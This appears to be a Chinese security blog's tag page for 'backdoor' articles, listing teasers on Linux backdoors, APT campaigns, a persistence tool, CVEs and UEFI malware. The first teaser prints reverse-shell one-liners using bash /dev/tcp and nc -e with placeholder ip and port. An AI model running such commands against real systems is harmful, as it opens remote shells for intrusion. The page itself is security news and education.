Linux 的 bash nc ssh SUID 后门 bashbash -i >& /dev/tcp/ip/port 0>&1 ncnc ip port -e /bin/...
12月15日安全博客15 views评论nc
后门
Linux 的几种后门
12月15日安全博客15 views评论nc
后门
12月15日安全博客15 views评论nc
后门
朝鲜的Kimsuky瞄准韩国研究机构进行后门攻击
The North Korean threat actor known as Kimsuky has been observed targeting research institutes in So...
12月11日44 views评论kimsuky
后门
【安全圈】超八成国产安卓机顶盒“预装”恶意软件?背后黑客每月可轻松赚取200万美元
关键词 恶意软件 一月份,安全研究人员Daniel Milisic发现一款名为T95的廉价安卓机顶盒一开箱就感染了恶意软件,其他多名安全研究人员也证实了这一发现。但这只是冰山一角。本周,网络安全公司H...
10月10日60 views评论后门
恶意软件
[工具篇] 后渗透权限维持工具-HackerPermKeeper
介绍通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]查...
10月04日72 views评论后门
权限
MinIO权限提升漏洞(CVE-2023-28434)
一、漏洞概述 CVE ID CVE-2023-28434 发现时间 2023-09-05 类 型 权限提升 等 级 高危 攻击向量 网络 所需权限 低 攻击复杂度 低 用户交互 无 P...
09月05日安全漏洞86 views评论后门
权限提升漏洞
PHP-8.1.0-dev 后门命令执行 nucleI POC
“人生再难,不过八万餐。” PHP 8.1.0-dev 版本的后门RCE,攻击者可以通过发送User-Agentt头来执行任意代码。 工具检测 检测脚本 https://github.com/Engi...
08月31日75 views评论nuclei
命令执行
【安全圈】朝鲜黑客入侵俄罗斯导弹公司,军工技术机密被窃取
关键词 黑客入侵 两个与朝鲜有联系的APT集团破坏了俄罗斯主要导弹工程公司NPO Mashinostroyeniya的基础设施。NPO Mashinostroyenia是俄罗斯领先的导弹和军用航天器制...
08月09日34 views评论俄罗斯
电子邮件
浅析SSH公钥后门
本文是i春秋论坛签约作家「fatmo」分享的技术文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。 fatmo 1年网络安全行业的从业经验,目前做安全开发的工作,擅长恶意代码分析,...
08月09日76 views评论公钥
后门
黑莲花UEFI引导后门的漏洞分析
点击蓝字 关注我们 黑莲花UEFI引导 后门的漏洞分析 一 UEFI介绍 UEFI,全称Unified Extensible Firmware Interface,即“统一的可扩展固件接口”,是一种详...
08月03日174 views评论地址
程序
CISA:在被黑的 Barracuda ESG 设备上发现新的潜艇恶意软件
关键词恶意软件CISA 表示,名为 Submarine 的新恶意软件通过利用现已修补的零日漏洞,在联邦机构网络上的 Barracuda ESG(电子邮件安全网关)设备中添加后门。一个疑似亲中国的黑客组...
07月31日31 views评论cisa
恶意软件
武汉市应急管理局地震监测中心被攻击
当护网走进现实,真实的网络战争一直存在。 据“平安江汉”官方微博消息,武汉市应急管理局地震监测中心报警称,该中心发现部分地震速报数据前端台站采集点网络设备被植入后门程序。该行为对国家安全构成严重威胁。...
07月27日48 views评论后门
管理局
美国监听世界的秘密武器暴露?保密多年的无线电加密代码TETRA 存在后门
世界各地关键基础设施工作人员、警察和其他人使用的无线电系统中的加密密码大白于天下,研究人员说这手段并不漂亮。 超过25 年来,一项用于世界各地关键数据和语音无线电通信的技术一直处于保密状态,以防止任何...
07月26日76 views评论后门
系统
21